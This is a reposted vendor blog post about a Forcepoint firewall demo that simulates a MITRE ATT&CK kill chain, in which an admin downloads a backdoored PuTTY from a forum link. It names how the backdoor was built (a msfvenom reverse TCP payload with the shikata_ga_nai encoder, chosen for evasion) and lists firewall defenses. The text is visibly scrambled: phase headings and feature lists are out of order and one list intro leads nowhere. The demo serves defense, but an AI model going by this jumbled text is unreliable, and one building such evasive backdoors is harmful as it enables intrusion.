Forcepoint NGFW MITRE ATT&CK simulation

Forcepoint.News.Trellix

In this scenario, an admin researches an issue, finds a potential solution on a forum. The solution provides a download link to PuTTY. Unfortunately, this file points to a malicious server and to a backdoored version of PuTTY.

Intrusion Prevention with Forcepoint NGFW

I used the MITRE ATT&CK framework to divide the simulation into sections. The following defense mechanisms are displayed during each phase:

The reverse TCP backdoor was added with msfvenom Metasploit framework using the shikata_ga_nai encoder, since it is typically difficult to detect. The attacker has a listener on his machine waiting for the executable to open a reverse TCP connection back home.

  •  URL Filtering
  •  Deep Packet Inspection
  •  File Filtering (Sandbox)

2. Execution

1. Initial Access

  •  DLP Integration

Here’s my kill chain video demo:

  •  ECA Whitelisting
  • Snort Integration

3. Exfiltration

  • IP Address lists
  •  Packet validation (IP & TCP)
  • Correlation situations
  • File reputation
  • Anti malware
  • User based restrictions
  • LS Decryption
  • Sidewinder proxy

Of note: To create seamless and smooth demo, I silenced multiple defense mechanisms during deep packet inspection. A partial list of items that were not displayed in the video include:

This post was first first published on Forcepoint website by Jenny Heino. You can view it by clicking here